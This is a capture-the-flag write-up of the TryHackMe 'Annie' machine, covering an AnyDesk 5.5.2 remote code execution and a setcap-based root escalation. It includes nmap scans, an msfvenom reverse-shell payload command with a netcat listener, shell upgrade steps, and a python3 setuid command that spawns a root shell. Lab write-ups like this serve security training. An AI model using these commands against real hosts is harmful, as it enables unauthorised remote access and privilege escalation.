TryHackMe : Annie (Hacking AnyDesk Application)

Intro : It is Medium Level Machine in TryHackMe. Here we will find an ‘AnyDesk’ application which we have to compromise and get user access and PrivEsc with ‘setcap’ binary. So let’s start.

Nmap Scan :

As usual we will start with a Nmap Scan to find open Ports. Here 2 Ports are open : 22(ssh) and 7070(realserver).

Tip : nmap -sT -p- -Pn -T4 <ip> -vv

Nmap Scan

I don’t know what application is running on Port 7070. So I started a Nmap service version scan. And I get this.

Tip : nmap -sVC -Pn -p 7070 -T4 <ip> -vv

So it is running ‘AnyDesk Client’. But there is no version specified. I search in Google for AnyDesk exploit and I get this.

Exploit AnyDesk :

The 5.5.2 version is vulnerable to RCE. So I start testing blindly on that Port as we don’t know the proper version.

For this we have to generate a shellcode with ‘msfvenon’.

Tip : msfvenom -p linux/x64/shell_reverse_tcp LHOST=<tun0_ip> LPORT=<port> -b ‘\x00\x25\x26’ -f python -v shellcode

You will get an Output like this.

Now replace this shellcode with that one you find in that exploit. And also change the IP with victim’s IP Address. Port will be same.

Now save the exploit and set your Netcat listener to that Port set in ‘msfvenom’ builder LPORT. Then run that exploit with python2 (python3 will not work).

User Access :

And after sometime I get a Shell.

I am now ‘annie’ User. Then I upgrade the shell as this shell is not properly usable.

Tip1 : python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

ctrl+Z

stty raw -echo;fg

export TERM=xterm (Press Enter)

And I get the User flag. So from here we realize the version is 5.5.2; that’s why I can exploit that.

Privilege Escalation :

So it’s time for some PrivEsc.

I try for ‘sudo -l’ but there is no password. Then I fired up my weapon : ‘Linpeas’.

After sometime found I found an Interesting SUID capability is there : setcap.

Interesting!!! With this I can set any type of capability to an file eventually to a python binary that helps us to get Root.

I found an Interesting Blog here about this PrivEsc.

So I decided to set capability on python3 binary. I copy the python3 binary file in my Folder and type the following command to set capability.

Tip : setcap cap_setuid+ep /usr/bin/python3

It will set SUID bit to that Binary. You can check if the capability is set or not using this command.

Tip : getcap -r / 2>/dev/null

After that I ran the following command mentioned in that blog.

Tip : ./python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

As soon as I ran the command it prompted to Root.

Yaaa!!! And we completed the Room. Hope you learn something new here.

THANKS FOR READING !!

Happy Hacking~